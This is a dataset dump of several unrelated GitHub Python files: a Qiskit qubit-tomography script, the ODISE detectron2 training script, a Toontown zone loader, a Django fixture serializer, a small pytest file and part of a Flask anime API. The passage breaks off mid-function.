regitros\n qc = QuantumCircuit(A,S,B, cr)\n qc.append(U_operator(angles_a,angles_b),[A,S,B])\n\n ## Usamos el simulador de IBM para obtener la matriz asociada al operador\n backend = BasicAer.get_backend('unitary_simulator')\n job = execute(qc, backend)\n U = job.result().get_unitary(qc)\n return U\n\ndef T_matrix(U):\n\n ## we define the U_{ij} operators\n U_00 = np.matrix(np.array([[U[0,0],U[0,2]],[U[2,0],U[2,2]]]) + np.array([[U[0,1],U[0,3]],[U[2,1],U[2,3]]]) + np.array([[U[0,4],U[0,6]],[U[2,4],U[2,6]]]) + np.array([[U[0,5],U[0,7]],[U[2,5],U[2,7]]]))\n U_01 = np.matrix(np.array([[U[1,0],U[1,2]],[U[3,0],U[3,2]]]) + np.array([[U[1,1],U[1,3]],[U[3,1],U[3,3]]]) + np.array([[U[1,4],U[1,6]],[U[3,4],U[3,6]]]) + np.array([[U[1,5],U[1,7]],[U[3,5],U[3,7]]]))\n U_10 = np.matrix(np.array([[U[4,0],U[4,2]],[U[6,0],U[6,2]]]) + np.array([[U[4,1],U[4,3]],[U[6,1],U[6,3]]]) + np.array([[U[4,4],U[4,6]],[U[6,4],U[6,6]]]) + np.array([[U[4,5],U[4,7]],[U[6,5],U[6,7]]]))\n U_11 = np.matrix(np.array([[U[5,0],U[5,2]],[U[7,0],U[7,2]]]) + np.array([[U[5,1],U[5,3]],[U[7,1],U[7,3]]]) + np.array([[U[5,4],U[5,6]],[U[7,4],U[7,6]]]) + np.array([[U[5,5],U[5,7]],[U[7,5],U[7,7]]]))\n\n ## and theyr adjoints\n U_00d = U_00.getH()\n U_01d = U_01.getH()\n U_10d = U_10.getH()\n U_11d = U_11.getH()\n\n ## The auxiliary operators A and B\n A = 1/16*(np.matmul(U_00d,U_10) + np.matmul(U_01d,U_11) + np.matmul(U_10d,U_00) + np.matmul(U_11d,U_01))\n B = 1/16*(np.matmul(U_00d,U_01) + np.matmul(U_01d,U_00) + np.matmul(U_10d,U_11) + np.matmul(U_11d,U_10))\n C = 1/16*(np.matmul(U_00d,U_11) + np.matmul(U_01d,U_10) + np.matmul(U_10d,U_01) + np.matmul(U_11d,U_00))\n\n ## We define the Pauli matrices and the identiry\n X = np.matrix([[0,1],[1,0]])\n Y = np.matrix([[0,-j],[j,0]])\n Z = np.matrix([[1,0],[0,-1]])\n I = np.matrix([[1,0],[0,1]])\n\n ## We evaluate the components of the a_\\mu, b_\\mu and c_\\mu vectors\n a0 = 0.5*np.trace(np.matmul(A,I))\n a1 = 0.5*np.trace(np.matmul(A,X))\n a2 = 0.5*np.trace(np.matmul(A,Y))\n a3 = 0.5*np.trace(np.matmul(A,Z))\n\n b0 = 0.5*np.trace(np.matmul(B,I))\n b1 = 0.5*np.trace(np.matmul(B,X))\n b2 = 0.5*np.trace(np.matmul(B,Y))\n b3 = 0.5*np.trace(np.matmul(B,Z))\n\n c0 = 0.5*np.trace(np.matmul(C,I))\n c1 = 0.5*np.trace(np.matmul(C,X))\n c2 = 0.5*np.trace(np.matmul(C,Y))\n c3 = 0.5*np.trace(np.matmul(C,Z))\n\n T = np.matrix([[0.25+a0+b0+c0, a1+b1+c1, a2+b2+c2, a3+b3+c3],[0.25+a0-b0-c0, a1-b1-c1, a2-b2-c2, a3-b3-c3],[0.25-a0+b0-c0, -a1+b1-c1, -a2+b2-c2, -a3+b3-c3],[0.25-a0-b0+c0, -a1-b1+c1, -a2-b2+c2, -a3-b3+c3]])\n return T\n\ndef bloch_vector_to_state(s):\n ## We transform the bloch vector into a qubit state\n s1 = s[0]\n s2 = s[1]\n s3 = s[2]\n\n if (s3>0):\n th=np.arctan(np.sqrt(s1*s1 + s2*s2)/s3)\n elif (s3 == 0):\n th = pi/2\n elif (s3 < 0):\n th=np.arctan(np.sqrt(s1*s1 + s2*s2)/s3) + pi\n\n if (s1>0 and s2>0):\n phi = np.arctan(s2/s1)\n elif (s1>0 and s2<0):\n phi = np.arctan(s2/s1) + 2*pi\n elif (s1 == 0):\n phi = pi/2*np.sign(s2)\n elif (s1<0):\n phi = np.arctan(s2/s1) + pi\n\n ## We write the alpha and beta amplitudes\n c_0 = np.cos(th/2)\n c_1 = (np.cos(phi) + complex(0,1)*np.sin(phi))*np.sin(th/2)\n\n state = np.array([c_0,c_1])\n return state\n\ndef init_ang_to_bloch_vector(angles):\n\n th, phi, lam = angles\n\n s = np.array([np.sin(th)*np.cos(phi), np.sin(th)*np.sin(phi), np.cos(th)])\n\n return s\n\n\ndef disc_ML_est(mm,freq):\n ## Function for maximun-likeihood estimation\n ## mm = measurement matrix\n ## freq = probabilities from the experiment\n mm = np.array(mm)\n se = np.array([1.0,0.0,0.0,0.0])\n nint = 10000\n for k in range(1,nint):\n pe = np.dot(mm,se)\n\n re = np.dot(np.transpose(mm),(freq/pe))\n\n ge = re[1]**2 + re[2]**2 + re[3]**2 - re[0]**2\n se[1] = (2*re[1]-se[1]*ge)/(2*re[0]+ge)\n se[2] = (2*re[2]-se[2]*ge)/(2*re[0]+ge)\n se[3] = (2*re[3]-se[3]*ge)/(2*re[0]+ge)\n return se\n\ndef main():\n\n args = get_args()\n shots = 1024\n th_a1,phi_a1,lam_a1,th_b1,phi_b1,lam_b1 = 0.5871626, 1.57737493, 2.52063619, 0.70004151, 4.30553732, 3.45993977\n th_a2,phi_a2,lam_a2,th_b2,phi_b2,lam_b2 = 2.55283129, 1.93819982, 0.30976956, 0.67288561, 6.47455126, 4.4695403\n\n angles_a=[th_a1,phi_a1,lam_a1,th_a2,phi_a2,lam_a2]\n angles_b=[th_b1,phi_b1,lam_b1,th_b2,phi_b2,lam_b2]\n\n\n\n U = U_matrix(angles_a,angles_b)\n T = T_matrix(U)\n\n ## Initial angles of the rotation that defines the initial state of the qubit S\n angle_i=[pi/2,0,0]\n\n ## Quantum registers of the A, B and S qubits\n A = QuantumRegister(1,'a')\n S = QuantumRegister(1,'s')\n B = QuantumRegister(1,'b')\n cr = ClassicalRegister(3)\n\n ## Circuit initialization\n tomography_circuit = QuantumCircuit(A,S,B, cr)\n\n ## We initialize our qubits\n tomography_circuit.append(Initialization(angle_i),[A,S,B])\n tomography_circuit.barrier()\n\n ## Apply the evolution operator\n tomography_circuit.append(U_operator(angles_a,angles_b),[A,S,B])\n tomography_circuit.barrier()\n\n ## Change the measurement basis\n tomography_circuit.h(A) #A\n tomography_circuit.h(B) #B\n tomography_circuit.barrier()\n\n ## Measurement of the A and B meters\n tomography_circuit.measure(A,cr[0]) #A\n tomography_circuit.measure(B,cr[2]) #B\n\n print(\"Running on backend = \", args.backend)\n\n if args.backend == \"simulator\" or args.backend == \"aer\":\n\n backend = Aer.get_backend('qasm_simulator')\n basis_gates = backend.configuration().basis_gates\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024).result()\n \n elif args.backend == \"IBMQ\":\n IBMQ.load_account()\n\n provider=IBMQ.get_provider('ibm-q')\n backend = provider.get_backend('ibmq_lima')\n\n basis_gates = backend.configuration().basis_gates\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n print(\"Running on \", backend.configuration().backend_name)\n\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024).result()\n\n elif args.backend == \"helmi\":\n from csc_qu_tools.qiskit import Helmi as helmi\n provider = helmi()\n backend = provider.set_backend()\n basis_gates = provider.basis_gates\n\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n virtual_qubits = transpiled_tomography_circuit.qubits\n qubit_mapping = {\n virtual_qubits[0]: \"QB1\",\n virtual_qubits[1]: \"QB3\",\n virtual_qubits[2]: \"QB2\",\n }\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024, qubit_mapping=qubit_mapping).result()\n\n elif args.backend == \"fake_helmi\":\n from csc_qu_tools.qiskit.mock import FakeHelmi\n\n print(\n \"Inducing artificial noise into Simulator with FakeHelmi Noise Model\"\n )\n basis_gates = [\"r\", \"cz\"]\n backend = FakeHelmi()\n\n transpiled_tomography_circuit = transpile(tomography_circuit, basis_gates=basis_gates)\n transpiled_tomography_circuit = RemoveBarriers()(transpiled_tomography_circuit)\n\n virtual_qubits = transpiled_tomography_circuit.qubits\n qubit_mapping = {\n virtual_qubits[0]: \"QB1\",\n virtual_qubits[1]: \"QB3\",\n virtual_qubits[2]: \"QB2\",\n }\n Sim_result_tomography_circuit = backend.run(transpiled_tomography_circuit, shots=1024, qubit_mapping=qubit_mapping).result()\n\n\n else:\n sys.exit(\"Backend option not recognized\")\n\n Sim_result_counts_tomography_circuit = Sim_result_tomography_circuit.get_counts()\n\n ## We build the vector P\n if '000' in Sim_result_counts_tomography_circuit:\n p00 = Sim_result_counts_tomography_circuit['000']/shots\n else:\n p00 = 0\n\n if '001' in Sim_result_counts_tomography_circuit:\n p01 = Sim_result_counts_tomography_circuit['001']/shots\n else:\n p01 = 0\n if '100' in Sim_result_counts_tomography_circuit:\n p10 = Sim_result_counts_tomography_circuit['100']/shots\n else:\n p10 = 0\n if '101' in Sim_result_counts_tomography_circuit:\n p11 = Sim_result_counts_tomography_circuit['101']/shots\n else:\n p11 = 0\n\n p = np.array([p00, p01, p10, p11])\n print(p*shots)\n U = U_matrix(angles_a, angles_b)\n T = T_matrix(U)\n \n s = np.array(np.matmul(np.linalg.inv(T),p), ndmin=0)\n s = np.reshape(s,4)\n\n s_ml = disc_ML_est(T, p)\n s_test_ml = [s_ml[1], s_ml[2], s_ml[3]]\n print(s)\n\n s1=s[1].real\n s2=s[2].real\n s3=s[3].real\n\n s_test = [s1,s2,s3]\n\n s_ideal = init_ang_to_bloch_vector(angle_i)\n ## Initialize a 1 qubit circuit\n qr = QuantumRegister(1)\n cr = ClassicalRegister(1)\n\n qc_i = QuantumCircuit(qr,cr)\n\n ## Use the U rotation that we used for initializing the qubit S\n qc_i.u(angle_i[0],angle_i[1],angle_i[2],qr[0])\n\n backend = BasicAer.get_backend('statevector_simulator')\n result = execute(qc_i, backend).result()\n\n ## Take the statevector\n initial_state = result.get_statevector(qc_i)\n estim_state = bloch_vector_to_state(s_test)\n estim_state_ml = bloch_vector_to_state(s_test_ml)\n\n ## Calculate the fidelity\n fidelity = state_fidelity(initial_state,estim_state)\n fidelity_ml = state_fidelity(initial_state,estim_state_ml)\n print('Estimation fidelity: ',fidelity)\n print('Estimation norm: ', np.linalg.norm(s_test))\n\n print('Estimation fidelity: ',fidelity_ml)\n print('Estimation norm: ', np.linalg.norm(s_test_ml))\n\n\n ## Save the plots for visualization\n plot_bloch_vector(s_test, title=\"Estimated state\").savefig(\"figures/estimation_test_\"+args.backend+\".pdf\")\n plot_bloch_vector(s_test_ml, title=\"Estimated state\").savefig(\"figures/estimation_test_\"+args.backend+\"_ml.pdf\")\n plot_bloch_vector(s_ideal, title=\"Initial state\").savefig(\"figures/initial_test.pdf\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"cagalvisf/Qubit_state_estimation","sub_path":"Plus_QSE_test.py","file_name":"Plus_QSE_test.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"75176757495","text":"import argparse\nimport logging\nimport os.path as osp\nfrom contextlib import ExitStack\nfrom typing import MutableSequence\nfrom detectron2.config import LazyConfig, instantiate\nfrom detectron2.engine import create_ddp_model, default_argument_parser, hooks, launch\nfrom detectron2.evaluation import print_csv_format\nfrom detectron2.utils import comm\nfrom detectron2.utils.events import JSONWriter\nfrom detectron2.utils.file_io import PathManager\nfrom detectron2.utils.logger import setup_logger\nfrom iopath.common.s3 import S3PathHandler\nfrom omegaconf import OmegaConf\n\nfrom odise.checkpoint import ODISECheckpointer\nfrom odise.config import auto_scale_workers, instantiate_odise\nfrom odise.engine.defaults import default_setup, get_dataset_from_loader, get_model_from_module\nfrom odise.engine.hooks import EvalHook\nfrom odise.engine.train_loop import AMPTrainer, SimpleTrainer\nfrom odise.evaluation import inference_on_dataset\nfrom odise.utils.events import CommonMetricPrinter, WandbWriter, WriterStack\n\nPathManager.register_handler(S3PathHandler())\n\nlogger = logging.getLogger(\"odise\")\n\n\ndef default_writers(cfg):\n \"\"\"\n Build a list of :class:`EventWriter` to be used.\n It now consists of a :class:`CommonMetricPrinter`,\n :class:`TensorboardXWriter` and :class:`JSONWriter`.\n\n Args:\n output_dir: directory to store JSON metrics and tensorboard events\n max_iter: the total number of iterations\n\n Returns:\n list[EventWriter]: a list of :class:`EventWriter` objects.\n \"\"\"\n if \"log_dir\" in cfg.train:\n log_dir = cfg.train.log_dir\n else:\n log_dir = cfg.train.output_dir\n PathManager.mkdirs(log_dir)\n ret = [\n # It may not always print what you want to see, since it prints \"common\" metrics only.\n CommonMetricPrinter(\n cfg.train.max_iter, run_name=osp.join(cfg.train.run_name, cfg.train.run_tag)\n ),\n JSONWriter(osp.join(log_dir, \"metrics.json\")),\n ]\n if cfg.train.wandb.enable_writer:\n ret.append(\n WandbWriter(\n max_iter=cfg.train.max_iter,\n run_name=osp.join(cfg.train.run_name, cfg.train.run_tag),\n output_dir=log_dir,\n project=cfg.train.wandb.project,\n config=OmegaConf.to_container(cfg, resolve=False),\n resume=cfg.train.wandb.resume,\n )\n )\n\n return ret\n\n\nclass InferenceRunner:\n def __init__(self, cfg, model):\n self.cfg = cfg\n self.model = model\n\n def __call__(self, final_iter=False, next_iter=0):\n return do_test(self.cfg, self.model, final_iter=final_iter, next_iter=next_iter)\n\n\ndef do_test(cfg, model, *, final_iter=False, next_iter=0):\n all_ret = dict()\n # make a copy incase we modify it every time calling do_test\n cfg = OmegaConf.create(cfg)\n\n # BC for detectron\n if \"evaluator\" in cfg.dataloader and \"test\" in cfg.dataloader:\n task_final_iter_only = cfg.dataloader.get(\"final_iter_only\", False)\n task_eval_period = cfg.dataloader.get(\"eval_period\", 1)\n if not final_iter and (task_final_iter_only or next_iter % task_eval_period != 0):\n logger.info(\n f\"Skip test set evaluation at iter {next_iter}, \"\n f\"since task_final_iter_only={task_final_iter_only}, \"\n f\"next_iter {next_iter} % task_eval_period {task_eval_period}\"\n f\"={next_iter % task_eval_period} != 0\"\n )\n else:\n loader = instantiate(cfg.dataloader.test)\n\n if \"wrapper\" in cfg.dataloader:\n wrapper_cfg = cfg.dataloader.wrapper\n # look for the last wrapper\n while \"model\" in wrapper_cfg:\n wrapper_cfg = wrapper_cfg.model\n wrapper_cfg.model = get_model_from_module(model)\n # poping _with_dataset_\n if wrapper_cfg.pop(\"_with_dataset_\", False):\n wrapper_cfg.dataset = get_dataset_from_loader(loader)\n inference_model = create_ddp_model(instantiate(cfg.dataloader.wrapper))\n else:\n inference_model = model\n\n # poping _with_dataset_\n if isinstance(cfg.dataloader.evaluator, MutableSequence):\n for i in range(len(cfg.dataloader.evaluator)):\n if cfg.dataloader.evaluator[i].pop(\"_with_dataset_\", False):\n cfg.dataloader.evaluator[i].dataset = get_dataset_from_loader(loader)\n else:\n if cfg.dataloader.evaluator.pop(\"_with_dataset_\", False):\n cfg.dataloader.evaluator.dataset = get_dataset_from_loader(loader)\n\n ret = inference_on_dataset(\n inference_model,\n loader,\n instantiate(cfg.dataloader.evaluator),\n use_amp=cfg.train.amp.enabled,\n )\n print_csv_format(ret)\n all_ret.update(ret)\n if \"extra_task\" in cfg.dataloader:\n for task in cfg.dataloader.extra_task:\n task_final_iter_only = cfg.dataloader.extra_task[task].get(\"final_iter_only\", False)\n task_eval_period = cfg.dataloader.extra_task[task].get(\"eval_period\", 1)\n if not final_iter and (task_final_iter_only or next_iter % task_eval_period != 0):\n logger.info(\n f\"Skip {task} evaluation at iter {next_iter}, \"\n f\"since task_final_iter_only={task_final_iter_only}, \"\n f\"next_iter {next_iter} % task_eval_period {task_eval_period}\"\n f\"={next_iter % task_eval_period} != 0\"\n )\n continue\n\n logger.info(f\"Evaluating extra task: {task}\")\n loader = instantiate(cfg.dataloader.extra_task[task].loader)\n\n # poping _with_dataset_\n if isinstance(cfg.dataloader.extra_task[task].evaluator, MutableSequence):\n for i in range(len(cfg.dataloader.extra_task[task].evaluator)):\n if cfg.dataloader.extra_task[task].evaluator[i].pop(\"_with_dataset_\", False):\n cfg.dataloader.extra_task[task].evaluator[\n i\n ].dataset = get_dataset_from_loader(loader)\n else:\n if cfg.dataloader.extra_task[task].evaluator.pop(\"_with_dataset_\", False):\n cfg.dataloader.extra_task[task].evaluator.dataset = get_dataset_from_loader(\n loader\n )\n\n if \"wrapper\" in cfg.dataloader.extra_task[task]:\n wrapper_cfg = cfg.dataloader.extra_task[task].wrapper\n # look for the last wrapper\n while \"model\" in wrapper_cfg:\n wrapper_cfg = wrapper_cfg.model\n wrapper_cfg.model = get_model_from_module(model)\n # poping _with_dataset_\n if wrapper_cfg.pop(\"_with_dataset_\", False):\n wrapper_cfg.dataset = get_dataset_from_loader(loader)\n inference_model = create_ddp_model(\n instantiate(cfg.dataloader.extra_task[task].wrapper)\n )\n else:\n inference_model = model\n\n ret = inference_on_dataset(\n inference_model,\n loader,\n instantiate(cfg.dataloader.extra_task[task].evaluator),\n use_amp=cfg.train.amp.enabled,\n )\n print_csv_format(ret)\n all_ret.update(ret)\n logger.info(\"Evaluation results for all tasks:\")\n print_csv_format(all_ret)\n return all_ret\n\n\ndef do_train(args, cfg):\n \"\"\"\n Args:\n cfg: an object with the following attributes:\n model: instantiate to a module\n dataloader.{train,test}: instantiate to dataloaders\n dataloader.evaluator: instantiate to evaluator for test set\n optimizer: instantaite to an optimizer\n lr_multiplier: instantiate to a fvcore scheduler\n train: other misc config defined in `configs/common/train.py`, including:\n output_dir (str)\n init_checkpoint (str)\n amp.enabled (bool)\n max_iter (int)\n eval_period, log_period (int)\n device (str)\n checkpointer (dict)\n ddp (dict)\n \"\"\"\n logger = logging.getLogger(\"odise\")\n # set wandb resume before create writer\n cfg.train.wandb.resume = args.resume and ODISECheckpointer.has_checkpoint_in_dir(\n cfg.train.output_dir\n )\n # create writers at the beginning for W&B logging\n if comm.is_main_process():\n writers = default_writers(cfg)\n comm.synchronize()\n\n # not sure why d2 use ExitStack(), maybe easier for multiple context\n with ExitStack() as stack:\n stack.enter_context(\n WriterStack(\n logger=logger,\n writers=writers if comm.is_main_process() else None,\n )\n )\n logger.info(f\"Wandb resume: {cfg.train.wandb.resume}\")\n # log config again for w&b\n logger.info(f\"Config:\\n{LazyConfig.to_py(cfg)}\")\n\n model = instantiate_odise(cfg.model)\n model.to(cfg.train.device)\n\n cfg.optimizer.params.model = model\n optim = instantiate(cfg.optimizer)\n\n train_loader = instantiate(cfg.dataloader.train)\n\n if cfg.train.amp.enabled:\n model = create_ddp_model(model, **cfg.train.ddp)\n trainer = AMPTrainer(model, train_loader, optim, grad_clip=cfg.train.grad_clip)\n else:\n model = create_ddp_model(model, **cfg.train.ddp)\n trainer = SimpleTrainer(model, train_loader, optim, grad_clip=cfg.train.grad_clip)\n\n checkpointer = ODISECheckpointer(\n model,\n cfg.train.output_dir,\n trainer=trainer,\n )\n\n # set wandb resume before create writer\n cfg.train.wandb.resume = args.resume and checkpointer.has_checkpoint()\n logger.info(f\"Wandb resume: {cfg.train.wandb.resume}\")\n\n trainer.register_hooks(\n [\n hooks.IterationTimer(),\n hooks.LRScheduler(scheduler=instantiate(cfg.lr_multiplier)),\n hooks.PeriodicCheckpointer(checkpointer, **cfg.train.checkpointer)\n if comm.is_main_process()\n else None,\n EvalHook(cfg.train.eval_period, InferenceRunner(cfg, model)),\n hooks.BestCheckpointer(checkpointer=checkpointer, **cfg.train.best_checkpointer)\n if comm.is_main_process() and \"best_checkpointer\" in cfg.train\n else None,\n hooks.PeriodicWriter(\n writers=writers,\n period=cfg.train.log_period,\n )\n if comm.is_main_process()\n else None,\n ]\n )\n comm.synchronize()\n\n checkpointer.resume_or_load(cfg.train.init_checkpoint, resume=args.resume)\n if args.resume and checkpointer.has_checkpoint():\n # The checkpoint stores the training iteration that just finished, thus we start\n # at the next iteration\n start_iter = trainer.iter + 1\n else:\n start_iter = 0\n comm.synchronize()\n # keep trainer.train() out of stack since it has try/catch handling\n trainer.train(start_iter, cfg.train.max_iter)\n\n\ndef main(args):\n cfg = LazyConfig.load(args.config_file)\n cfg.train.run_name = (\n \"${train.cfg_name}_bs${dataloader.train.total_batch_size}\" + f\"x{comm.get_world_size()}\"\n )\n if hasattr(args, \"reference_world_size\") and args.reference_world_size:\n cfg.train.reference_world_size = args.reference_world_size\n cfg = auto_scale_workers(cfg, comm.get_world_size())\n cfg.train.cfg_name = osp.splitext(osp.basename(args.config_file))[0]\n if hasattr(args, \"output\") and args.output:\n cfg.train.output_dir = args.output\n else:\n cfg.train.output_dir = osp.join(\"output\", cfg.train.run_name)\n if hasattr(args, \"tag\") and args.tag:\n cfg.train.run_tag = args.tag\n cfg.train.output_dir = osp.join(cfg.train.output_dir, cfg.train.run_tag)\n if hasattr(args, \"wandb\") and args.wandb:\n cfg.train.wandb.enable_writer = args.wandb\n cfg.train.wandb.enable_visualizer = args.wandb\n if hasattr(args, \"amp\") and args.amp:\n cfg.train.amp.enabled = args.amp\n if hasattr(args, \"init_from\") and args.init_from:\n cfg.train.init_checkpoint = args.init_from\n cfg.train.log_dir = cfg.train.output_dir\n if hasattr(args, \"log_tag\") and args.log_tag:\n cfg.train.log_dir = osp.join(cfg.train.log_dir, args.log_tag)\n cfg = LazyConfig.apply_overrides(cfg, args.opts)\n default_setup(cfg, args)\n logger = setup_logger(cfg.train.log_dir, distributed_rank=comm.get_rank(), name=\"odise\")\n\n logger.info(f\"Running with config:\\n{LazyConfig.to_py(cfg)}\")\n\n if args.eval_only:\n model = instantiate_odise(cfg.model)\n model.to(cfg.train.device)\n model = create_ddp_model(model)\n ODISECheckpointer(model, cfg.train.output_dir).resume_or_load(\n cfg.train.init_checkpoint, resume=args.resume\n )\n with ExitStack() as stack:\n stack.enter_context(\n WriterStack(\n logger=logger,\n writers=default_writers(cfg) if comm.is_main_process() else None,\n )\n )\n logger.info(do_test(cfg, model, final_iter=True))\n # Evaluation may take different time among workers.\n # A barrier make them start the next iteration together.\n comm.synchronize()\n else:\n do_train(args, cfg)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n \"odise training and evaluation script\",\n parents=[default_argument_parser()],\n add_help=False,\n )\n\n parser.add_argument(\n \"--output\",\n type=str,\n help=\"root of output folder, \" \"the full path is //\",\n )\n parser.add_argument(\"--init-from\", type=str, help=\"init from the given checkpoint\")\n parser.add_argument(\"--tag\", default=\"default\", type=str, help=\"tag of experiment\")\n parser.add_argument(\"--log-tag\", type=str, help=\"tag of experiment\")\n parser.add_argument(\"--wandb\", action=\"store_true\", help=\"Use W&B to log experiments\")\n parser.add_argument(\"--amp\", action=\"store_true\", help=\"Use AMP for mixed precision training\")\n parser.add_argument(\"--reference-world-size\", \"--ref\", type=int)\n\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n )\n","repo_name":"NVlabs/ODISE","sub_path":"tools/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":14939,"program_lang":"python","lang":"en","doc_type":"code","stars":711,"dataset":"github-code","pt":"22"} +{"seq_id":"23901933619","text":"from toontown.safezone import DGPlayground\nfrom toontown.safezone import SafeZoneLoader\n\n\nclass DGSafeZoneLoader(SafeZoneLoader.SafeZoneLoader):\n def __init__(self, hood, parentFSM, doneEvent):\n SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)\n self.playgroundClass = DGPlayground.DGPlayground\n self.musicFile = 'phase_8/audio/bgm/DG_nbrhood.ogg'\n self.activityMusicFile = 'phase_8/audio/bgm/DG_SZ.ogg'\n self.dnaFile = 'phase_8/dna/daisys_garden_sz.pdna'\n self.safeZoneStorageDNAFile = 'phase_8/dna/storage_DG_sz.pdna'\n\n def load(self):\n SafeZoneLoader.SafeZoneLoader.load(self)\n self.birdSound = list(map(base.loader.loadSfx, ['phase_8/audio/sfx/SZ_DG_bird_01.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_02.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_03.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_04.ogg']))\n\n def unload(self):\n SafeZoneLoader.SafeZoneLoader.unload(self)\n del self.birdSound","repo_name":"nate97/toontown-src-py3.0","sub_path":"toontown/safezone/DGSafeZoneLoader.py","file_name":"DGSafeZoneLoader.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"2518806031","text":"import src.calculation as calculation\n\nclass TestCal(object):\n\n @classmethod\n def setup_class(cls):\n cls.cal = calculation.Cal()\n\n def test_add_num_add_double(self):\n os_name = 'mac'\n if os_name == 'mac':\n print('ls')\n elif os_name == 'window':\n print('dir')\n assert self.cal.add_num_and_double(1, 1) == 4","repo_name":"tkedjp/pytest","sub_path":"tests/test_calculation.py","file_name":"test_calculation.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19801843605","text":"import json\n\n\n\"\"\"\nStructure of JSON fixtures\n[\n {\"id\": 1, \"first_name\": \"Christie\", \"last_name\": \"Gann\", \"email\": \"cgann0@hostgator.com\",\n \"gender\": \"Female\", \"ip_address\": \"57.14.195.231\"}, \n {\"id\": 2, \"first_name\": \"Hamil\", \"last_name\": \"Cressey\", \"email\": \"hcressey1@delicious.com\",\n \"gender\": \"Male\", \"ip_address\": \"45.225.25.145\"}, ...\n]\n\nFixtures files must match django serialization format, e.g:\n[\n {\n \"pk\": \"4b678b301dfd8a4e0dad910de3ae245b\",\n \"model\": \"sessions.session\",\n \"fields\": {\n \"expire_date\": \"2013-01-16T08:16:59.844Z\",\n ...\n }\n }, ...\n]\n\nSo we need to rewrite the fixtures in the following way:\n- Add model key\n- Add pk field\n- Move the rest of fields to fields inner object\n\n\"\"\"\n\nUSER_FIXTURE_PATH = 'users.json'\nUSER_STATISTIC_FIXTURE_PATH = 'users_statistic.json'\n\nRESULT_USER_FIXTURE_PATH = 'serialized_user.json'\nRESULT_USER_STATISTIC_FIXTURE_PATH = 'serialized_statistic_user.json'\n\n\n# Serialize json for User model\nwith open(USER_FIXTURE_PATH, 'r') as json_file:\n # Result JSON data\n data = []\n\n json_file = json.loads(json_file.read())\n\n for obj in json_file:\n new_obj = {\n 'pk': obj.get('id'),\n 'model': 'core.User',\n 'fields': obj\n }\n data.append(new_obj)\n\n # Writes serialized data into new json\n with open(RESULT_USER_FIXTURE_PATH, 'w') as result_json_file:\n print(RESULT_USER_FIXTURE_PATH)\n print('Serialized successfuly !!!')\n result_json_file.write(json.dumps(data))\n\n\n# Serialize json for Statistic model\nwith open(USER_STATISTIC_FIXTURE_PATH, 'r') as json_file:\n # Result JSON data\n data = []\n\n json_file = json.loads(json_file.read())\n\n for pk, obj in enumerate(json_file, start=1):\n new_obj = {\n 'pk': pk,\n 'model': 'core.Statistic',\n 'fields': obj\n }\n data.append(new_obj)\n\n # Writes serialized data into new json\n with open(RESULT_USER_STATISTIC_FIXTURE_PATH, 'w') as result_json_file:\n print(RESULT_USER_STATISTIC_FIXTURE_PATH)\n print('Serialized successfuly !!!')\n result_json_file.write(json.dumps(data))\n","repo_name":"yueow/django-stat-app","sub_path":"django_fixture_serializer.py","file_name":"django_fixture_serializer.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33645011313","text":"import json\nimport pandas as pd\nfrom flask import Response, render_template, request\nfrom flask_restx import Api, Resource, fields\nfrom src import create_app\nfrom src.models import Anime as model\nfrom src.views import get_all, get_item, get_items_from_index, \\\n delete_item, delete_items_from_index, \\\n update_item_in_table, add_item\n\napp = create_app()\n\napi = Api(\n app, \n version='0.0.1', \n title='Anime API',\n description='Manage anime through the application',\n license=\"Blah\",\n license_url=\"blahblahblah.com\",\n contact=\"Aashish Chaubey\",\n contact_url=\"https://aashishchaubey.com\",\n contact_email=\"aashish.l@acldigital.com\"\n)\n\nns_anime = api.namespace('anime', description='Anime operations')\n\nanime_model = api.model('Anime', {\n 'anime_id': fields.Integer,\n 'title': fields.String\n})\n\n@ns_anime.route('/')\nclass AnimeList(Resource):\n '''Shows a list of all animes'''\n def get(self):\n \"\"\"List all animes\"\"\"\n animes = get_all(model=model)\n anime_list = []\n for anime in animes:\n new_anime = {\n \"anime_id\": anime.anime_id,\n \"title\": anime.title\n }\n anime_list.append(new_anime)\n resp = Response(\n response=json.dumps(anime_list),\n status=200,\n mimetype=\"application/json\"\n )\n resp.headers['Access-Control-Allow-Origin'] = '*'\n return resp\n\n\n@ns_anime.route('/')\n@ns_anime.response(404, 'Anime not found')\n@ns_anime.param('idx', 'Anime identifier')\nclass Anime(Resource):\n '''Single anime item operations - GET, UPDATE, DELETE'''\n\n def get(self, idx):\n \"\"\"Get a specific anime\"\"\"\n item = get_item(model=model, id=idx)\n if item is None:\n resp = render_template('error_message.html')\n else:\n item = {\n \"anime_id\": idx,\n \"title\": str(item)\n }\n resp = Response(\n response=json.dumps(item),\n status=200,\n mimetype=\"application/json\"\n )\n 